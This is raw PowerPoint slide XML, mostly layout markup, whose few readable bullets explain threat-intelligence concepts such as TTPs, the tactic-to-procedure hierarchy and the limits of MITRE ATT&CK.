            <a:t>Tactic -&gt; Technique -&gt; (</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-AU" sz="2100" kern="1200" dirty="0" err="1"/>
            <a:t>Subtechnique</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-AU" sz="2100" kern="1200" dirty="0"/>
            <a:t>) -&gt; Procedure</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="2100" kern="1200" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="57558" y="335653"/>
        <a:ext cx="6551717" cy="1063956"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{25C867CA-B4F0-4A76-98D9-99D995A306E5}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="1517647"/>
          <a:ext cx="6666833" cy="1179072"/>
        </a:xfrm>
        <a:prstGeom prst="roundRect">
          <a:avLst/>
        </a:prstGeom>
        <a:gradFill rotWithShape="0">
          <a:gsLst>
            <a:gs pos="0">
              <a:schemeClr val="accent4">
                <a:hueOff val="2199979"/>
                <a:satOff val="-9734"/>
                <a:lumOff val="-1634"/>
                <a:alphaOff val="0"/>
                <a:satMod val="103000"/>
                <a:lumMod val="102000"/>
                <a:tint val="94000"/>
              </a:schemeClr>
            </a:gs>
            <a:gs pos="50000">
              <a:schemeClr val="accent4">
                <a:hueOff val="2199979"/>
                <a:satOff val="-9734"/>
                <a:lumOff val="-1634"/>
                <a:alphaOff val="0"/>
                <a:satMod val="110000"/>
                <a:lumMod val="100000"/>
                <a:shade val="100000"/>
              </a:schemeClr>
            </a:gs>
            <a:gs pos="100000">
              <a:schemeClr val="accent4">
                <a:hueOff val="2199979"/>
                <a:satOff val="-9734"/>
                <a:lumOff val="-163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AU" sz="2100" kern="1200"/>
            <a:t>The security community refers to “TTPs” as the general tactics and techniques that threat actors employ</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="2100" kern="1200"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="57558" y="1575205"/>
        <a:ext cx="6551717" cy="1063956"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{2EFF0F07-7D62-4466-B1BC-255A922ED20A}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="2757200"/>
          <a:ext cx="6666833" cy="1179072"/>
        </a:xfrm>
        <a:prstGeom prst="roundRect">
          <a:avLst/>
        </a:prstGeom>
        <a:gradFill rotWithShape="0">
          <a:gsLst>
            <a:gs pos="0">
              <a:schemeClr val="accent4">
                <a:hueOff val="4399958"/>
                <a:satOff val="-19468"/>
                <a:lumOff val="-3269"/>
                <a:alphaOff val="0"/>
                <a:satMod val="103000"/>
                <a:lumMod val="102000"/>
                <a:tint val="94000"/>
              </a:schemeClr>
            </a:gs>
            <a:gs pos="50000">
              <a:schemeClr val="accent4">
                <a:hueOff val="4399958"/>
                <a:satOff val="-19468"/>
                <a:lumOff val="-3269"/>
                <a:alphaOff val="0"/>
                <a:satMod val="110000"/>
                <a:lumMod val="100000"/>
                <a:shade val="100000"/>
              </a:schemeClr>
            </a:gs>
            <a:gs pos="100000">
              <a:schemeClr val="accent4">
                <a:hueOff val="4399958"/>
                <a:satOff val="-19468"/>
                <a:lumOff val="-326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AU" sz="2100" kern="1200"/>
            <a:t>Tracking what an actor’s broader tactics are, instead of the exact tools they use, is more useful</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="2100" kern="1200"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="57558" y="2814758"/>
        <a:ext cx="6551717" cy="1063956"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{71510EB2-E65E-4F7D-9283-5817FF52C9C3}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="3996752"/>
          <a:ext cx="6666833" cy="1179072"/>
        </a:xfrm>
        <a:prstGeom prst="roundRect">
          <a:avLst/>
        </a:prstGeom>
        <a:gradFill rotWithShape="0">
          <a:gsLst>
            <a:gs pos="0">
              <a:schemeClr val="accent4">
                <a:hueOff val="6599937"/>
                <a:satOff val="-29202"/>
                <a:lumOff val="-4903"/>
                <a:alphaOff val="0"/>
                <a:satMod val="103000"/>
                <a:lumMod val="102000"/>
                <a:tint val="94000"/>
              </a:schemeClr>
            </a:gs>
            <a:gs pos="50000">
              <a:schemeClr val="accent4">
                <a:hueOff val="6599937"/>
                <a:satOff val="-29202"/>
                <a:lumOff val="-4903"/>
                <a:alphaOff val="0"/>
                <a:satMod val="110000"/>
                <a:lumMod val="100000"/>
                <a:shade val="100000"/>
              </a:schemeClr>
            </a:gs>
            <a:gs pos="100000">
              <a:schemeClr val="accent4">
                <a:hueOff val="6599937"/>
                <a:satOff val="-29202"/>
                <a:lumOff val="-490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AU" sz="2100" kern="1200"/>
            <a:t>MITRE ATT&amp;CK is still just a means of tracking behaviour though – it is based on threat intelligence, which is based on known attacks. All of this takes time.</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="2100" kern="1200"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="57558" y="4054310"/>
        <a:ext cx="6551717" cy="106395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AE2A3-3AE5-EE4F-E5B4-7AE6914E6EC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U"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Subtitle 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{978A7C3B-A1CD-5CBA-B42D-CD0A24E3AA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EB460C9B-9B51-B23C-9222-410F8BBC8D15}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{4CCB3584-3AA0-4595-BD82-808302B781F3}" type="datetimeFigureOut">
              <a:rPr lang="en-AU" smtClean="0"/>
              <a:t>13/08/2025</a:t>
            </a:fld>
            <a:endParaRPr lang="en-AU"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Footer Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9A4EC7E4-BFEA-5A2B-2E20-C4ABA38E9DB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0D0FA3D-C695-9E19-B3F8-CA09EEAF53F1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{59FEC748-9296-4ED5-9FC3-E98E3133FF86}" type="slidenum">
              <a:rPr lang="en-AU" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-AU"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1948423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22B8B-0146-1275-2C07-1FF729D40FDC}"/>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FA4B51B2-ECD0-37CD-7C90-1AE801C68BE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84B41DD0-345B-0630-5519-094C12F67EB9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{4CCB3584-3AA0-4595-BD82-808302B781F3}" type="datetimeFigureOut">
              <a:rPr lang="en-AU" smtClean="0"/>
              <a:t>13/08/2025</a:t>
            </a:fld>
            <a:endParaRPr lang="en-AU"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Footer Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{94899C3C-136C-1159-16D8-BF72976CCD2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252268B-F9E2-E221-8A37-ABD60546F1AD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{59FEC748-9296-4ED5-9FC3-E98E3133FF86}" type="slidenum">
              <a:rPr lang="en-AU" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-AU"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4089470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5AE751-8D58-8687-FCD1-030FA430C9B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C6461288-8E00-B588-79A4-5C5AA41B760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AEAFB6E9-3009-7F48-D9C2-BF38806DBD9D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{4CCB3584-3AA0-4595-BD82-808302B781F3}" type="datetimeFigureOut">
              <a:rPr lang="en-AU" smtClean="0"/>
              <a:t>13/08/2025</a:t>
            </a:fld>
            <a:endParaRPr lang="en-AU"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Footer Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B3F45AB6-162F-817F-71F3-0E49A045014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38531FA-1CAA-417D-B413-2EC3D52AFF04}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{59FEC748-9296-4ED5-9FC3-E98E3133FF86}" type="slidenum">
              <a:rPr lang="en-AU" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-AU"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3809343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50922-F080-B4E1-665C-2338F3D354E6}"/>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4E8B5B87-91DD-96FE-36B6-20F8E7C0A50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1F0274FC-4AB9-11FF-848F-96F594E10AD9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{4CCB3584-3AA0-4595-BD82-808302B781F3}" type="datetimeFigureOut">
              <a:rPr lang="en-AU" smtClean="0"/>
              <a:t>13/08/2025</a:t>
            </a:fld>
            <a:endParaRPr lang="en-AU"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Footer Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AD15AEEE-36EE-5F14-D8D9-69683FE6DB6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1FA426B-715D-57FE-4982-87BCACC16AEF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{59FEC748-9296-4ED5-9FC3-E98E3133FF86}" type="slidenum">
              <a:rPr lang="en-AU" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-AU"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3171166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C948D-784C-6559-EAB1-D03DCD18F35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C8352E88-D314-C016-B1A8-71AB2E749C3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AEF347F-0DBF-BEEF-D834-8BB912736EBE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{4CCB3584-3AA0-4595-BD82-808302B781F3}" type="datetimeFigureOut">
              <a:rPr lang="en-AU" smtClean="0"/>
              <a:t>13/08/2025</a:t>
            </a:fld>
            <a:endParaRPr lang="en-AU"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Footer Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E1DB1AA3-0531-C9BD-5CCA-8836E207101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5CD2E92-3980-3090-02F2-DDF7FC5CF737}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{59FEC748-9296-4ED5-9FC3-E98E3133FF86}" type="slidenum">
              <a:rPr lang="en-AU" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-AU"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1037137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46411-F83B-DD66-4F86-D3DB9CB1EF9D}"/>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B4197553-DB01-D455-69CF-9D3DB9671D4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3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2C790C83-6828-0870-193D-E6863BA926A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Date Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{442A06A3-13C7-7EEE-4797-690A2EBC9DBF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{4CCB3584-3AA0-4595-BD82-808302B781F3}" type="datetimeFigureOut">
              <a:rPr lang="en-AU" smtClean="0"/>
              <a:t>13/08/2025</a:t>
            </a:fld>
            <a:endParaRPr lang="en-AU"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Footer Placeholder 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5E3EDDE1-FEA1-28B5-881A-C9B84B3ED11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55860A2-A77B-F450-DB41-2674F459251A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{59FEC748-9296-4ED5-9FC3-E98E3133FF86}" type="slidenum">
              <a:rPr lang="en-AU" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-AU"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2121357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77F55-2860-7F1C-7C66-1BB295E5200E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="839788" y="365125"/>
            <a:ext cx="10515600" cy="1325563"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Click to edit Master title style</a:t>
            </a:r>
            <a:endParaRPr lang="en-AU"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{86962583-2708-86B8-F998-C72EDA9456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1F4FA43-5C80-1260-F0D7-1646E0960B7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65A5D737-2A1D-A303-2163-78E210F865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BFE527D-D80C-A183-D9F0-1AE03BE46D2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Date Placeholder 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D0FB5A49-55B5-4A8A-0C9E-64BBFE8CAC19}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{4CCB3584-3AA0-4595-BD82-808302B781F3}" type="datetimeFigureOut">
              <a:rPr lang="en-AU" smtClean="0"/>
              <a:t>13/08/2025</a:t>
            </a:fld>
            <a:endParaRPr lang="en-AU"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Footer Placeholder 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E7BFAA28-3BF8-0727-6935-15FBFAEF3E21}"/>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F473219A-3D44-16BB-A9D2-735C3ED2E0D9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{59FEC748-9296-4ED5-9FC3-E98E3133FF86}" type="slidenum">
              <a:rPr lang="en-AU" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-AU"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1260149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97998-40D5-C23B-D2A9-539B3ACEBE3D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Click to edit Master title style</a:t>
            </a:r>
            <a:endParaRPr lang="en-AU"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Date Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2470EA7A-4078-02E0-C6B2-1D000FF45C52}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{4CCB3584-3AA0-4595-BD82-808302B781F3}" type="datetimeFigureOut">
              <a:rPr lang="en-AU" smtClean="0"/>
              <a:t>13/08/2025</a:t>
            </a:fld>
            <a:endParaRPr lang="en-AU"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Footer Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BAE22447-2564-5945-AB91-9C2B2E355D8B}"/>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ADA10C98-24D4-0E4C-EA54-4090AB900C7A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{59FEC748-9296-4ED5-9FC3-E98E3133FF86}" type="slidenum">
              <a:rPr lang="en-AU" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-AU"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2823654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B48464-BCDE-9E27-3068-DA821B5927AF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{4CCB3584-3AA0-4595-BD82-808302B781F3}" type="datetimeFigureOut">
              <a:rPr lang="en-AU" smtClean="0"/>
              <a:t>13/08/2025</a:t>
            </a:fld>
            <a:endParaRPr lang="en-AU"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Footer Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3F12D54F-838A-90A3-B813-B17698266D17}"/>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1046B9F-C5C0-044C-F9A5-1F525BEF5675}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{59FEC748-9296-4ED5-9FC3-E98E3133FF86}" type="slidenum">
              <a:rPr lang="en-AU" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-AU"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2895031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7B610-4477-21F1-8F40-C4CD35A3F68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83CE265F-3960-1DB4-FC3F-B78D2B110B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91A1A15F-2482-46E4-858B-0B56C1B74A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260743-4882-D0E8-0DD5-E34DB4A3DE5B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{4CCB3584-3AA0-4595-BD82-808302B781F3}" type="datetimeFigureOut">
              <a:rPr lang="en-AU" smtClean="0"/>
              <a:t>13/08/2025</a:t>
            </a:fld>
            <a:endParaRPr lang="en-AU"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Footer Placeholder 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{53AE9F0E-2977-E158-F439-50944949C4E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2758E19-7869-348C-BCB3-8275B3F188E2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{59FEC748-9296-4ED5-9FC3-E98E3133FF86}" type="slidenum">
              <a:rPr lang="en-AU" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-AU"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3656341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0F67D-661F-D3F5-346C-8CE41BB095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Picture Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FBF769F2-4772-192D-3563-6E8E5A6C8B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1EC807FF-8ED7-E262-689A-8DFB832545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113C921-1C96-43C1-A2EE-2BB0CB43516D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
